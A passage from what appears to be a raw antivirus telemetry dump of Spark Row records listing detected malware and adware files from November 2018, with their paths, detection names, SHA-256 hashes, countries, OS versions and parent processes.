  Row(detection=Row(filename='lio first outline.doc', filepath='LIO First Outline.doc', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:19:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ae86', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ae86', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:08:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224629-196dfa49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc556bdb\\AVSCAN-20181104-221024-04D0AAB1\\AVSCAN-20181104-224629-196DFA49', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='d0327891171e6689768c4d99a2d2e90f822f924a800631780e9908f7d20f5695', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:50:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a63c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a63c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:58:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203649-fc131d42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203649-FC131D42', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:36:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-30-004642/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:56:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl11f.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl11F.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002922a1', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002922a1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:06:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023fa15', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023fa15', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:20:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl184.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl184.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144750-001c1b73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3ac0d7c\\AVSCAN-20181104-140302-AD230418\\AVSCAN-20181104-144750-001C1B73', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T07:47:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-26-024628/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:47:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nse84AB.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T18:50:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000ae01', filepath='C:\\Windows\\Temp\\900ec395-75da-4bed-8f6a-0bf10a5fc933\\tmp000000f7\\tmp0000ae01', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='fa09c041b7db5337e2cc0e55557535d86ce9490b8c59c0d0266b4d24722f27dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.1.856.11526\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-04T11:56:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-165341-11251adf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-163706-4CB2CFCA\\AVSCAN-20181101-165341-11251ADF', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:53:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:40:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_c2bcaee2_c8ae2729.exe', filepath='C:\\Users\\X\\Desktop\\Favorites\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_c2bcaee2_c8ae2729.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='f8ae2ddddb99dfa1e6b750bff51b221dd1a0a5f0fe281a29b0bd4fb17a7d45e5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:44:03Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='adorage.dll', filepath='C:\\Program Files\\CyberLink\\Shared files\\Plugin\\proDAD\\adorage.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='0f1aadc40295db58302849cfe1f06bbee568c045c4997fa7ac177fd19f928106', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CyberLink\\PowerDirector13\\PDR13.exe', parentsize=3479304, timestamp='2018-11-02T04:09:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='alawarwrapper.pif', filepath='C:\\Users\\X\\Documents\\AlawarWrapper\\AlawarWrapper.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jdzsc1nwlg2q9s.exe', filepath='\\\\?\\C:\\Windows.old\\ProgramData\\FlashCoupon\\jdZsc1nwlg2Q9S.exe', filesize=640000, name='Adware/Multiplug.eor.#M1.#R1'), hash='49a7975cb3b2a8b007acf26df412ccb0fd81cdae3f2cd9e3cf74589f29c7a725', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hidpi.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\skins\\moono\\images\\hidpi\\hidpi.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194544-30cba0ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b332e29\\AVSCAN-20181102-192951-86ADDA3C\\AVSCAN-20181102-194544-30CBA0CE', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:56:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161746-60c04747', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-161538-52C9C851\\AVSCAN-20181102-161746-60C04747', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:17:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T17:15:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keyhook64.dll', filepath='C:\\Windows\\KeyHook64.dll', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-02T02:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5ff5d685ddf30aa8399b22626da95c80e5019d9c513ff044df8ded8de1297b5b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\5FF5D685DDF30AA8399B22626DA95C80E5019D9C513FF044DF8DED8DE1297B5B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5ff5d685ddf30aa8399b22626da95c80e5019d9c513ff044df8ded8de1297b5b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102031-d19f4aea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-102031-D19F4AEA', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ldapaddmt.exe', filepath='\\\\?\\D:\\app\\Administrator\\product\\11.2.0\\dbhome_1\\BIN\\ldapaddmt.exe', filesize=512000, name='W32/Sality.AW.#M1.#R1'), hash='655ec7322540346aef69d87298252cc9a058054fc620599395c92201da91db03', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T21:13:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='abrites commander for renault.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ABRITES software for ID 172243\\Renault\\ABRITES Commander for Renault.exe', filesize=52224000, name='HEUR/AGEN.1012543.#M1.#R1'), hash='38f60413f0bce0465d0d9bbf02e52b89da53e7e8fc7e546d7481ab1413e6a952', metadata=Row(cmdline=None, country='IE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\العاب\\الابطال الخارقون\\سونك 2\\autorun.exe', filesize=4096000, name='W32/Ramnit.C.#M1.#R1'), hash='084c65c8650c7dfb95135dc74c9b7e800c9de71aac6a38dffaadefce84798a0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nvflash.exe', filepath='H:\\ACER\\Acer Z220 Via Flashtool\\Acer_DownloadTool_V20.01\\Tools\\NV\\nv_bin_JB2_17r16\\nvflash.exe', filesize=448000, name='W32/Sality.AT.#M1.#R1'), hash='08f93d91c3ff4d6f3845c33503e43f62c1ca0284bb2be320c614cf1df356a5ed', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='G:\\01. DATA PROGRAM\\Advan\\SPD_Upgrade_Tool_R2.9.9015\\UpgradeDownload.exe', parentsize=1756160, timestamp='2018-11-02T06:55:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5a835e53fb26d7d23cb817037d5497074a2a77677175b064871bf00c40cbe172', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\5A835E53FB26D7D23CB817037D5497074A2A77677175B064871BF00C40CBE172', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5a835e53fb26d7d23cb817037d5497074a2a77677175b064871bf00c40cbe172', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:15:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xf-adsk2015_x64.exe', filepath='C:\\Program Files\\Autodesk\\AutoCAD 2015\\xf-adsk2015_x64.exe', filesize=512000, name='TR/Crypt.ULPM.Gen.#M300.#R2603'), hash='29e89e82f6e359cc188c267ac082fb4537e474ea02e7dea9bac1bcaae26c189b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T04:19:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104635-10b1ce1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104635-10B1CE1B', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:46:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213213-3609c1f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5115e9e\\AVSCAN-20181102-213126-2D71625F\\AVSCAN-20181102-213213-3609C1F2', filesize=448000, name='Adware/FileTour.wry.#M1.#R1'), hash='07f5273a5ad4248030d732407f1a18edbadb1a63d281200a63e09b75c30185eb', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:31:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\E:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T00:55:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scrcons.exe', filepath='H:\\TẤT CẢ\\KHONG DUOC XOA\\O C\\WINDOWS\\system32\\dllcache\\scrcons.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='39837a254d2a0a0e63610c80db5acfd42b7dc9970c7356fb145ae0f395c86d10', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:37:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-042518-165ae6eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_64d7e858\\AVSCAN-20181102-042412-0DECDA73\\AVSCAN-20181102-042518-165AE6EB', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='QA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084154-561401da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-084142-5462E357\\AVSCAN-20181102-084154-561401DA', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:41:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06BB2F3F4067B24380E3D984A75ED522EA72E0FAF16425D0BB64BB127464322B', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:45:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ihctrl32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\ihctrl32.dll', filesize=1280000, name='TR/Dldr.Stantinko.21a421.#M1.#R1'), hash='21a4217fa52b44fef34afe7c146986a40e1218a883cf6332c6b0514142c5171e', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T13:33:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:53Z'), dt=datetime.date(2018, 11, 2)),
